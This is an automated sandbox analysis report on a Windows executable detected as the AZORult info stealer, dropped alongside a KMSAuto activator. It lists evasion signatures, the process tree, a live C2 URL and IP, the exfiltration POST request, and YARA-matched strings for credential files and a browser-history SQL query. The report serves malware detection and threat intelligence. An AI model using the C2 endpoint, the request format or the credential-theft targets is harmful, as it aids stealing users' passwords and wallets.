
Windows Analysis Report
ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe

Overview

General Information

Sample Name: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
Analysis ID: 834745
MD5: 1ac70328ce1dea448647022c5b360a67
SHA1: 4f295ccfc7b7a2eeeec53df66d22743dbac301a6
SHA256: addcdf9e3bac722442fb269492fea86e91d4e97ee5df4ca5c03515d534fb0c51
Tags: AZORult, exe

Detection

Azorult
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Azorult Info Stealer
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Hides threads from debuggers
Detected VMProtect packer
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to evade analysis by execution special instruction (VM detection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
IP address seen in connection with other malware
Entry point lies outside standard sections
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe (PID: 4204 cmdline: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe MD5: 1AC70328CE1DEA448647022C5B360A67)
    • csrss.exe (PID: 5224 cmdline: "C:\Users\user\AppData\Roaming\csrss.exe" /nc /s MD5: 2A0C555C70EB25094C94E4BA5A6BA131)
      • WerFault.exe (PID: 2584 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 1136 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • KMSAuto Net.exe (PID: 5148 cmdline: "C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe" /nc MD5: 2FB86BE791B4BB4389E55DF0FEC04EB7)
      • cmd.exe (PID: 6620 cmdline: cmd /c md "C:\Users\user\AppData\Local\MSfree Inc" MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5916 cmdline: cmd /c echo test>>"C:\Program Files (x86)\KMSAuto\KMSAuto Net\test.test" MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5528 cmdline: C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "test.test" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Azorult | AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit. | The Gorgon Group | | https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult

Malware configuration: {"C2 url": "http://f0355889.xsph.ru/Panel/index.php"}
Source | Rule | Description | Author | Strings
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_csrss.exe_f22660799b81b1cdf575f7ba80bebda2d012813c_4666b2e0_0a75e935\Report.wer | SUSP_WER_Suspicious_Crash_Directory | Detects a crashed application executed in a suspicious directory | Florian Roth (Nextron Systems)
  • 0x116:$a1: ReportIdentifier=
  • 0x198:$a1: ReportIdentifier=
  • 0x61c:$a2: .Name=Fault Module Name
  • 0x2efe:$a3: AppPath=
  • 0x2efe:$l4: AppPath=C:\Users\
  • 0x2efe:$s8: AppPath=C:\Users\user\AppData\Roaming\csrss.exe
Source | Rule | Description | Author | Strings
00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp | Windows_Trojan_Azorult_38fce9ea | unknown | unknown
  • 0x18fd0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
  • 0xd164:$a2: %APPDATA%\.purple\accounts.xml
  • 0xd8ac:$a3: %TEMP%\curbuf.dat
  • 0x189b0:$a4: PasswordsList.txt
  • 0x13d28:$a5: Software\Valve\Steam
Process Memory Space: csrss.exe PID: 5224 | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
Process Memory Space: csrss.exe PID: 5224 | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security

Source | Rule | Description | Author | Strings
1.2.csrss.exe.400000.0.unpack | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
1.2.csrss.exe.400000.0.unpack | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
1.2.csrss.exe.400000.0.unpack | Windows_Trojan_Azorult_38fce9ea | unknown | unknown
  • 0x193d0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
  • 0xd564:$a2: %APPDATA%\.purple\accounts.xml
  • 0xdcac:$a3: %TEMP%\curbuf.dat
  • 0x18db0:$a4: PasswordsList.txt
  • 0x14128:$a5: Software\Valve\Steam
1.2.csrss.exe.400000.0.unpack | Azorult_1 | Azorult Payload | kevoreilly
  • 0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
  • 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
No Sigma rule has matched

Timestamp: 03/25/23-14:27:06.642541
Source IP: 192.168.2.3
Source Port: 49695
Destination IP: 141.8.192.151
Destination Port: 80
SID: 2029465
Protocol: TCP
Classtype: A Network Trojan was detected

              AV Detection

Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | ReversingLabs: Detection: 56%
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Virustotal: Detection: 44%
Source: C:\Users\user\AppData\Roaming\csrss.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Roaming\csrss.exe | ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Roaming\csrss.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Joe Sandbox ML: detected
Source: 1.2.csrss.exe.400000.0.unpack | Malware Configuration Extractor: Azorult {"C2 url": "http://f0355889.xsph.ru/Panel/index.php"}
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

              Networking

Source: Traffic | Snort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49695 -> 141.8.192.151:80
Source: Malware configuration extractor | URLs: http://f0355889.xsph.ru/Panel/index.php
Source: Joe Sandbox View | IP Address: 141.8.192.151
Source: global traffic | HTTP traffic detected: POST /Panel/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: f0355889.xsph.ru Content-Length: 107 Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: openresty Date: Sat, 25 Mar 2023 13:27:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding
Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.dr | String found in binary or memory: " /S /Q3spp\store\cache\cache.dat5spp\store\cache\cache.dat";spp\store\2.0\cache\cache.dat=spp\store\2.0\cache\cache.dat"Uhttp://www.youtube.com/watch?v=niXf0ov0S8I equals www.youtube.com (Youtube)
Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.dr | String found in binary or memory: http://www.youtube.com/results?search_query=%22KMSAuto%20Net%202015%22+KMS Log Analyzer.xlsm equals www.youtube.com (Youtube)
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249938903.0000000002217000.00000004.00001000.00020000.00000000.sdmp, ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: csrss.exe, 00000001.00000003.274427424.0000000002E00000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://f0355889.xsph.ru/Panel/index.php
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.265139659.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.265177397.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: KMSAuto Net.exe.0.dr | String found in binary or memory: http://forum.ru-board.com
Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.dr | String found in binary or memory: http://forum.ru-board.comMarathiWindows
Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.dr | String found in binary or memory: http://goo.gl/eD7s9XShowWindowDominican
Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.dr | String found in binary or memory: http://goo.gl/eD7s9Xg
Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.dr | String found in binary or memory: http://habrahabr.ru/post/192986/#
Source: csrss.exe, csrss.exe, 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp | String found in binary or memory: http://ip-api.com/json
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249938903.0000000002217000.00000004.00001000.00020000.00000000.sdmp, ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: KMSAuto Net.exe, 00000002.00000002.516542366.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249938903.0000000002217000.00000004.00001000.00020000.00000000.sdmp, ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249938903.0000000002217000.00000004.00001000.00020000.00000000.sdmp, ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249938903.0000000002217000.00000004.00001000.00020000.00000000.sdmp, ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Amcache.hve.4.dr | String found in binary or memory: http://upx.sf.net
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: KMSAuto Net.exe, 00000002.00000002.519780552.0000000005D00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.coma
Source: KMSAuto Net.exe, 00000002.00000003.264730443.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264730443.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: KMSAuto Net.exe, 00000002.00000003.264730443.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264689563.0000000005D23000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.comW
Source: KMSAuto Net.exe, 00000002.00000003.264689563.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.comn
Source: KMSAuto Net.exe, 00000002.00000003.267280152.0000000005D04000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.267584430.0000000005D09000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.c
Source: KMSAuto Net.exe, 00000002.00000003.267584430.0000000005D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.c#
Source: KMSAuto Net.exe, 00000002.00000003.267182751.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: KMSAuto Net.exe, 00000002.00000003.267584430.0000000005D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: KMSAuto Net.exe, 00000002.00000003.267704547.0000000005D0B000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.267280152.0000000005D04000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.267584430.0000000005D09000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cnl
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/9
Source: KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/M
Source: KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0a
Source: KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Z
Source: KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/b
Source: KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/ito
Source: KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/~
Source: KMSAuto Net.exe, 00000002.00000003.264600737.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264730443.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264661332.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264634623.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264512674.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264465536.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264393524.0000000005D22000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264689563.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264764177.0000000005D24000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: KMSAuto Net.exe, 00000002.00000003.264600737.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264730443.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264661332.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264634623.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264512674.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264465536.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264393524.0000000005D22000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264689563.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264764177.0000000005D24000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.comd
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: KMSAuto Net.exe, 00000002.00000003.266039290.0000000005D09000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: KMSAuto Net.exe, 00000002.00000003.266039290.0000000005D09000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.krA
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.265177397.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: KMSAuto Net.exe, 00000002.00000003.265139659.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.comn
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.dr | String found in binary or memory: http://www.youtube.com/results?search_query=%22KMSAuto%20Net%202015%22
Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.dr | String found in binary or memory: http://www.youtube.com/watch?v=niXf0ov0S8I
Source: KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: csrss.exe, 00000001.00000003.255564669.0000000002E04000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.274376515.0000000002E0C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255583166.0000000002E08000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://cp.sprinthost.ru
Source: csrss.exe, 00000001.00000003.255564669.0000000002E04000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.274376515.0000000002E0C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255583166.0000000002E08000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://cp.sprinthost.ru/customer/ips/list
Source: csrss.exe, csrss.exe, 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp | String found in binary or memory: https://dotbit.me/a/
Source: csrss.exe, 00000001.00000003.255564669.0000000002E04000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255546682.0000000002E1C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255583166.0000000002E08000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.274427424.0000000002E00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255405907.0000000002E04000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255463802.0000000002E0C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://index.from.sh/pages/game.html
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: https://keepass.info/
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: https://keepass.info/1020KMSAuto
Source: unknown | HTTP traffic detected: POST /Panel/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: f0355889.xsph.ru Content-Length: 107 Cache-Control: no-cache
Source: unknown | DNS traffic detected: queries for: f0355889.xsph.ru

              System Summary

Source: 1.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Azorult Payload Author: kevoreilly
Source: 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: csrss.exe.0.dr | Static PE information: .vmp0 and .vmp1 section names
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 1.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_csrss.exe_f22660799b81b1cdf575f7ba80bebda2d012813c_4666b2e0_0a75e935\Report.wer, type: DROPPED | Matched rule: SUSP_WER_Suspicious_Crash_Directory date = 2019-10-18, author = Florian Roth (Nextron Systems), description = Detects a crashed application executed in a suspicious directory, score = , reference = https://twitter.com/cyb3rops/status/1185585050059976705
Source: C:\Users\user\AppData\Roaming\csrss.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 1136
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Code function: 0_3_046C3597
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Code function: 0_3_046BF8FF
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Code function: 0_3_046C2FE7
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Code function: 0_3_046C502A
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Code function: 0_3_046C1087
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Code function: 0_3_046C4887
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Code function: 0_3_046C3947
